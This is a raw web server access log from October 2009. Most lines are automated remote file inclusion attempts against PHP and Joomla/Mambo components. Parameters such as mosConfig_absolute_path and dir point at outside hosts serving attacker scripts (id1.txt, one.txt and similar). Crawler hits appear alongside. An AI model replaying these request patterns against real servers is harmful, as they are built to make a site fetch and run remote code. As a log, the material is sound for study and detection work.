85.17.19.172 - - [15/Oct/2009:23:27:53 -0500] "GET ///components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:23:27:53 -0500] "GET /logs/access_log.1248566400///components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:23:28:02 -0500] "GET ///components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:23:28:02 -0500] "GET /logs/access_log.1248566400///components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:23:28:02 -0500] "GET /logs///components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
85.17.19.172 - - [15/Oct/2009:23:28:09 -0500] "GET /logs/access_log.1249689600///components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.powervictory.org//id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
65.55.207.117 - - [15/Oct/2009:23:28:31 -0500] "GET /logs/access_log.1133481600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.151.132.176 - - [15/Oct/2009:23:29:35 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:29:35 -0500] "GET //skin/zero_vote/error.php?dir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:29:35 -0500] "GET /logs/access_log.1245283200//skin/zero_vote/error.php?dir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
174.133.148.98 - - [15/Oct/2009:23:31:32 -0500] "GET /logs/access_log.1251763200////skin/ggambo7002_board/comment_modify.php?dir=http://www.ivento.ru/IDtest.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
82.151.132.176 - - [15/Oct/2009:23:31:39 -0500] "GET /logs/access_log.1250208000//skin/zero_vote/error.php?dir=http://dubnahome.ru//one.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.207.71 - - [15/Oct/2009:23:35:31 -0500] "GET /logs/access_log.1242259200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.151.132.176 - - [15/Oct/2009:23:36:07 -0500] "GET /logs/access_log.1251244800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:36:07 -0500] "GET /logs/access_log.1248652800//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:36:07 -0500] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:36:07 -0500] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:38:41 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:38:41 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:38:41 -0500] "GET //guestbook1//admin.php?include_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:38:51 -0500] "GET /logs/access_log.1251417600//guestbook1//admin.php?include_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.206.120.162 - - [15/Oct/2009:23:38:52 -0500] "GET /show.php?path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 291 "-""Mozilla/5.0"
211.206.120.162 - - [15/Oct/2009:23:38:52 -0500] "GET /logs/access_log.1242864000/show.php?path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.206.120.162 - - [15/Oct/2009:23:38:52 -0500] "GET /logs/show.php?path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 296 "-""Mozilla/5.0"
91.196.124.10 - - [15/Oct/2009:23:39:57 -0500] "GET //xmlrpc.php HTTP/1.1" 404 294 "-""-"
91.196.124.10 - - [15/Oct/2009:23:40:05 -0500] "GET //xmlrpc.php HTTP/1.1" 404 294 "-""-"
91.196.124.10 - - [15/Oct/2009:23:40:05 -0500] "GET //xmlrpc.php HTTP/1.1" 404 294 "-""-"
91.196.124.10 - - [15/Oct/2009:23:40:32 -0500] "GET //xmlrpc.php HTTP/1.1" 404 294 "-""-"
91.196.124.10 - - [15/Oct/2009:23:40:32 -0500] "GET //xmlrpc.php HTTP/1.1" 404 294 "-""-"
91.196.124.10 - - [15/Oct/2009:23:40:44 -0500] "GET //xmlrpc.php HTTP/1.1" 404 294 "-""-"
82.151.132.176 - - [15/Oct/2009:23:42:25 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:42:25 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:42:26 -0500] "GET /logs/access_log.1243728000//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:42:31 -0500] "GET /logs/access_log.1242691200//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://dubnahome.ru//one.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:43:59 -0500] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:43:59 -0500] "GET /logs/access_log.1251763200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:43:59 -0500] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:44:02 -0500] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:44:02 -0500] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:44:02 -0500] "GET /logs/access_log.1251763200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
128.125.169.162 - - [15/Oct/2009:23:44:09 -0500] "GET //ask_password.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
128.125.169.162 - - [15/Oct/2009:23:44:09 -0500] "GET /logs/access_log.1240012800//ask_password.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
128.125.169.162 - - [15/Oct/2009:23:44:09 -0500] "GET /logs//ask_password.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
128.125.169.162 - - [15/Oct/2009:23:44:14 -0500] "GET /logs/access_log.1246147200//ask_password.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:44:18 -0500] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:44:18 -0500] "GET /logs/access_log.1251763200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:44:18 -0500] "GET /logs/access_log.1251763200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:44:18 -0500] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:44:18 -0500] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:44:18 -0500] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:44:22 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:44:22 -0500] "GET /logs/access_log.1233619200///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.196.124.10 - - [15/Oct/2009:23:44:31 -0500] "GET //xmlrpc.php HTTP/1.1" 404 294 "-""-"
72.11.145.8 - - [15/Oct/2009:23:44:33 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:44:33 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 65375 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:44:33 -0500] "GET /logs/access_log.1233619200///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:45:05 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
128.125.169.162 - - [15/Oct/2009:23:45:19 -0500] "GET /logs/access_log.1240012800//ask_password.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
128.125.169.162 - - [15/Oct/2009:23:45:19 -0500] "GET //ask_password.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
128.125.169.162 - - [15/Oct/2009:23:45:19 -0500] "GET /logs//ask_password.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
128.125.169.162 - - [15/Oct/2009:23:45:29 -0500] "GET /logs/access_log.1238803200//ask_password.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
125.251.147.194 - - [15/Oct/2009:23:46:06 -0500] "GET /logs/access_log.1240012800//ask_password.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
125.251.147.194 - - [15/Oct/2009:23:46:06 -0500] "GET //ask_password.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.251.147.194 - - [15/Oct/2009:23:46:06 -0500] "GET /logs//ask_password.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:46:30 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:46:30 -0500] "GET /logs/access_log.1233619200///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.11.145.8 - - [15/Oct/2009:23:47:00 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
211.206.120.162 - - [15/Oct/2009:23:48:03 -0500] "GET /show.php?path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 291 "-""Mozilla/5.0"
211.206.120.162 - - [15/Oct/2009:23:48:03 -0500] "GET /logs/show.php?path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.206.120.162 - - [15/Oct/2009:23:48:03 -0500] "GET /logs/access_log.1249084800/show.php?path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.206.120.162 - - [15/Oct/2009:23:48:03 -0500] "GET /logs/access_log.1242864000/show.php?path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.249.65.181 - - [15/Oct/2009:23:49:10 -0500] "GET /logs/access_log.1237161600 HTTP/1.1" 200 272432 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.11.145.8 - - [15/Oct/2009:23:54:02 -0500] "GET /logs/access_log.1241395200///?_SERVER[DOCUMENT_ROOT]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:54:18 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:54:18 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:54:18 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
85.94.201.138 - - [15/Oct/2009:23:54:27 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.55.106.203 - - [15/Oct/2009:23:54:31 -0500] "GET /logs/access_log.1116028800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.102.6.154 - - [15/Oct/2009:23:55:50 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:55:50 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:55:50 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:55:52 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:55:52 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:55:52 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:55:54 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
94.102.6.154 - - [15/Oct/2009:23:55:57 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:59:32 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:59:32 -0500] "GET /modules/My_eGallery/index.php?basepath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:59:32 -0500] "GET /logs/access_log.1231891200/modules/My_eGallery/index.php?basepath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:59:42 -0500] "GET /logs/access_log.1235260800/modules/My_eGallery/index.php?basepath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.151.132.176 - - [15/Oct/2009:23:59:49 -0500] "GET /logs/access_log.1234483200/modules/My_eGallery/index.php?basepath=http://dubnahome.ru//one.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:00:47 -0500] "GET /logs/access_log.1233705600/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dubnahome.ru//one.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:00:47 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dubnahome.ru//one.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:00:47 -0500] "GET /logs/access_log.1246406400/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dubnahome.ru//one.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
82.151.132.176 - - [16/Oct/2009:00:00:47 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dubnahome.ru//one.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:01:33 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:01:33 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:01:33 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:00:01:50 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:00:01:50 -0500] "GET //skin/zero_vote/error.php?dir=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:00:01:50 -0500] "GET /logs/access_log.1234137600//skin/zero_vote/error.php?dir=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:01:54 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:01:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:01:54 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:00:02:09 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/error.php?dir=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:02:51 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:03:01 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.106.234 - - [16/Oct/2009:00:03:01 -0500] "GET /logs/access_log.1180051200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.117.169.182 - - [16/Oct/2009:00:08:25 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:08:25 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:08:25 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:08:36 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:09:06 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:00:09:13 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.38.54.146 - - [16/Oct/2009:00:09:53 -0500] "GET /logs//send_reminders.php?noSet=0&includedir=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
70.38.54.146 - - [16/Oct/2009:00:09:53 -0500] "GET //send_reminders.php?noSet=0&includedir=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
87.230.85.142 - - [16/Oct/2009:00:14:19 -0500] "GET /logs/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:19 -0500] "GET /logs/access_log.1252108800/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:19 -0500] "GET /logs/access_log.1243382400/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:19 -0500] "GET /include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:21 -0500] "GET /include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:21 -0500] "GET /logs/access_log.1243382400/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:21 -0500] "GET /logs/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:21 -0500] "GET /logs/access_log.1252108800/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:24 -0500] "GET /logs/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:24 -0500] "GET /logs/access_log.1247443200/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:24 -0500] "GET /include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:24 -0500] "GET /logs/access_log.1248825600/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:38 -0500] "GET /include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:38 -0500] "GET /logs/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
87.230.85.142 - - [16/Oct/2009:00:14:38 -0500] "GET /logs/access_log.1252108800/include/main.php?config[search_disp]=include_dir=http://cartoon-sex-links.com/free/oldid1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
